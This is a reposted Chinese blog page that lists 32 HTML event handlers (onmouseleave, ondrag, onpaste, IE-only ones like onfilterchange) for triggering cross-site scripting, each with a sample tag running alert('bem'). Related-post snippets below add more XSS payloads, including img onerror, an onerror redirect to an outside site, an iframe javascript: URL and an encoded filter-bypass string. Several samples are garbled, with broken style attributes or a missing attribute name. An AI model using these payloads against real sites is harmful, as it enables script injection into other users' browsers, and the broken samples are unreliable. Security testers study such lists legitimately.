32个触发事件XSS语句的总结

最新推荐文章于 2024-06-14 14:17:19 发布
转载 最新推荐文章于 2024-06-14 14:17:19 发布 · 238 阅读 · 3 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/hookjoy/p/4109682.html

本文详细介绍了HTML中的各种事件,包括鼠标事件、焦点事件、拖放事件等,并提供了具体的使用示例。

http://hi.baidu.com/cr3xdker/blog/item/02f94520c1e39c56ad34dee6.html
1、onmouseenter:当鼠标进入选区执行代码
<div style="123456</div>


2、onmouseleave:当鼠标离开选区执行代码
<DIV onmouseleave="alert('bem')" style="123456</DIV>


3、onmousewheel:当鼠标在选区滚轮时执行代码
<DIV onmousewheel="alert('bem')" style="123456</DIV>


4、onscroll:拖动滚动条执行代码
<div style="width:100px;height:100px;overflow:scroll" onscroll="alert('bem')">123456
<br/>
<br/>
<br/>
<br/>
<br/>
</div>


5、onfocusin:当获得焦点时执行代码
<div contentEditable="true" style="asdf</div>


6、onfocusout:当失去焦点时执行代码
<div contentEditable="true" style="asdf</div>


7、onstart:当显示内容时执行代码
<marquee style="background-color:red" onstart="alert('bem')" >asdf</marquee>


8、onbeforecopy:选中内容后右键执行代码
<div style="" onbeforecopy="alert('bem')" >asdf</div>


9、onbeforecut:选中内容后右键执行代码
<div style="" onbeforecut="alert('bem')" >asdf</div>


10、onbeforeeditfocus:当获得焦点时执行代码
<div style="" contentEditable="true" onbeforeeditfocus="alert('bem')" >asdf</div>


11、onbeforepaste:选中内容后右键执行代码
<div style="" ="true" onbeforepaste="alert('bem')" >asdf</div>


12、oncontextmenu:鼠标右键执行代码
<div style="" oncontextmenu="alert('bem')" >asdf</div>


13、oncopy:鼠标右键执行复制时执行代码
<div style="" oncopy="alert('bem')" >asdf</div>


14、oncut:鼠标右键执行剪切时执行代码
<div contentEditable="true" style="" oncut="alert('bem')" >asdf</div>


15、ondrag:选择内容并拖动时执行代码
<div style="" ondrag="alert('bem')" >asdf</div>


16、ondragend:选择内容并拖动松开鼠标执行代码
<div style="" ondragend="alert('bem')" >asdf</div>


17、ondragenter:选择内容并拖动时执行代码
<div style="" ondragenter="alert('bem')" >asdf</div>


18、ondragleave:选择内容并拖出边框执行代码
<div contentEditable="true" style="" ondragleave="alert('bem')" >asdf</div>


19、ondragover:选择内容并拖动时执行代码
<div contentEditable="true" style="" ondragover="alert('bem')" >asdf</div>


20、ondragstart:选择内容并拖动时执行代码
<div contentEditable="true" style="" ondragstart="alert('bem')" >asdf</div>


21、ondrop:有内容被拖动进来时执行代码
<div contentEditable="true" style="" ondrop="alert('bem')" >asdf</div>
<div contentEditable="true" style="" ondrop="alert('bem')" >asdf</div>


22、onlosecapture:选择内容时执行代码
<div contentEditable="true" style="" onlosecapture="alert('bem')" >asdf</div>


23、onpaste:粘贴时执行代码
<div contentEditable="true" style="" onpaste="alert('bem')" >asdf</div>


24、onselectstart:选择内容时执行代码
<div contentEditable="true" style="" onselectstart="alert('bem')" >asdf</div>


25、onhelp:进入焦点按F1时执行代码
<div contentEditable="true" style="" onhelp="alert('bem')" >asdf</div>


26、onEnd:当时间线执行完毕时执行代码
<div STYLE="behavior:url('#default#time2')" onEnd="alert('bem')">asdf</div>


27、onBegin:当时间线开始执行代码
<div STYLE="behavior:url('#default#time2')" onBegin="alert('bem')">asdf</div>


28、onactivate:激活当前标签时执行代码
<div contentEditable="true" STYLE="" onactivate="alert('bem')">asdf</div>


29、onfilterchange:当滤镜改变时执行代码
<div contentEditable="true" STYLE="filter: Alpha(opacity=100, style=2);" onfilterchange="alert('bem')">asdf</div>


30、onbeforeactivate:当激活当前标签时执行代码
<div contentEditable="true" STYLE="" onbeforeactivate="alert('bem')">asdf</div>


31、onbeforedeactivate:当标签内值改变时执行代码
<div contentEditable="true" STYLE="" onbeforedeactivate="alert('bem')">asdf</div>


32、ondeactivate:当标签内值改变时执行代码
<div contentEditable="true" STYLE="" ondeactivate="alert('bem')">asdf</div>

转载于:https://www.cnblogs.com/hookjoy/p/4109682.html

XSS常见的触发标签
技术超强的网络安全平台
05-11 3118
无过滤情况 <sciript> <script>alert(1);</sciript> <img> 图片加载错误时触发 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss')")> 鼠标指针移动到元素时触发 <img src=1 onmouseover="alert(1)"> 鼠标指针移出时触发 <img src=1 onmouseo
关于 Xss 攻击的那些事
wumu0927的博客
01-03 3886
关于 Xss 攻击的那些事 文章首发于个人博客 前言 准备秋招的时候, 背了一些关于 Xss 的八股文, 但是没有深入了解, 所以当时面试回答的时候, 只能自己背的那部分说出来, 当面试官一深问时, 就回答不出来了, 直到现在有时间去研究 Xss 攻击, 才发现和自己背的八股文有一些区别。 文章中的 ???? 源代码都可以在这里下载, 最好是自己运行一遍, 结合本文食用最佳!!! 什么是 Xss 攻击 跨站脚本攻击(Xss)是一种代码注入攻击, 允许攻击者在其他用户的浏览器上执行恶意 JavaScrip
XSS事件(一)
banji5552的博客
10-27 356
前言 ​ 最近做的一个项目因为安全审计需要,需要做安全改造。其中自然就包括XSS和CSRF漏洞安全整改。关于这两个网络安全漏洞的详细说明,可以参照我本篇博客最后的参考链接。当然,我这里并不是想写一篇安全方面的专题。我要讲的是在做了XSS漏洞修复之后引发的一系列事件。 超时 ​ 本地测试的时候随便点了些页面,然后debug跟了下代码未发现任何问题。上线之后用户反馈有的页面打不开,自己去线...
xss常用标签和触发事件
2301_81475812的博客
04-14 1252
img src="x" onerror=document.location=``//www.baidu.com``>html标签中用//可以代替http://<img src="x" onerror="document.location=``http://www。<iframe src="javascript:prompt(``xss``)"></iframe>(````只有两个``)
xss语句构造.docx
01-02
本文将详细介绍XSS语句的构造方法,包括常见的大小写绕过、双写绕过、空格代替、事件的使用等。 一、利用构造HTML/JS 可以利用构造HTML标签和标签。在测试页面提交参数[利用构造HTML/JS</h1>],提交[<script>alert...
32XSS攻击触发事件实例详解:新手入门必备
本文总结了32个不同触发事件下可能导致XSS漏洞的JavaScript语句,这对于初学者理解和防御此类攻击具有重要的参考价值。 1. **鼠标事件**: onmouseenter 和 onmouseleave 是两种基于鼠标动作的触发器。攻击者可以...
使用这个xss语句,点击一个返回即可触发xss <D3v%0aonpOinTEREnler%09=%09(prompt)~>y3dm0s
最新发布
05-10
总结来说,用户提供的payload可能存在几个问题:事件处理器名称是否正确,事件类型是否符合点击触发,函数调用是否正确。需要指导用户如何调整这个payload,或者解释为什么这个payload可能有效或无效,以及如何正确...
xss可用事件
weixin_33772645的博客
08-25 388
onabort onafterprint onbeforeprint onbeforeunload onblur oncanplay oncanplaythrough onchange onclick oncontextmenu ondblclick ondrag ondragend ondragenter ondragleave ondragover ondrag...
XSS学习大全
05-02
XSS学习大全,攻防入门,轻松上手,简单易学,推荐下载
XSS 攻击案例
人生不过是一场旅行,你路过我,我路过你,各自向前,各自修行。
07-05 2651
The attacker injects a payload in the website’s database by submitting a vulnerable form with some malicious JavaScript The victim requests the web page from the website The website serves the vict...
初识XSS
yesdmmf的博客
06-14 1098
XSS漏洞的定义 XSS全称(Cross Site Scripting)跨站脚本攻击,为了与CSS有区别,所以被称为XSSXSS攻击是指通过HTML注入篡改网页,插入恶意js代码,从而在用户浏览网页是,嵌入在web里的js代码会被执行,从而达到恶意攻击的特殊目的。 XSS触发条件 标签弹窗:<script>alert(1)</script> 伪协议触发:<a javascript:alert(1)></a> 事件触发: 1、加载图片成功时:<img
xss攻击详解
剁椒鱼头没剁椒的博客
11-15 9679
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
全网最详细 XSS 跨站脚本攻击,不是过来打死我!!
liuhyusb的博客
06-21 3077
​。
跨站脚本攻击(XSS)详解
Karka_的博客
01-02 1403
XSS(Cross Site Script)攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。一开始,这种攻击的演示案例是跨域的,所以叫做"跨站脚本"。现在是否跨域已经不再重要,但是名字一直沿用下来。XSS长期以来被列为客户端Web安全中的头号大敌。因为XSS破坏力强大,且产生的场景复杂,难以一次性解决。下面举个XSS的例子php?如果用户提交了一段HTML代码alert(/xss/)就会在页面中执行,弹出框显示/xss/。
跨站脚本攻击XSS(Cross Site Scripting)总结
野原新之助
01-31 1251
XSS是指开发者在开发网页时,对用户的输入没有进行安全过滤,导致用户在可以输入内容的地方,插入脚本语句,执行恶意脚本代码,可以对数据库、服务器、用户等造成影响和危害,危险等级很高,也很常见。
XSS攻击原理及危害,说的太详细了!(值得收藏)
周沐子
04-08 7521
防范存储型和反射型 XSS 是后端的责任DOM 型 XSS 攻击不发生在后端,是前端的责任。不同的上下文,调用不同的转义规则如 HTML 属性、HTML 文字内容、HTML 注释、跳转链接、内联 JavaScript 字符串、内联 CSS 样式表等,所需要的转义规则不一致。业务 需要选取合适的转义库,并针对不同的上下文调用不同的转义规则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值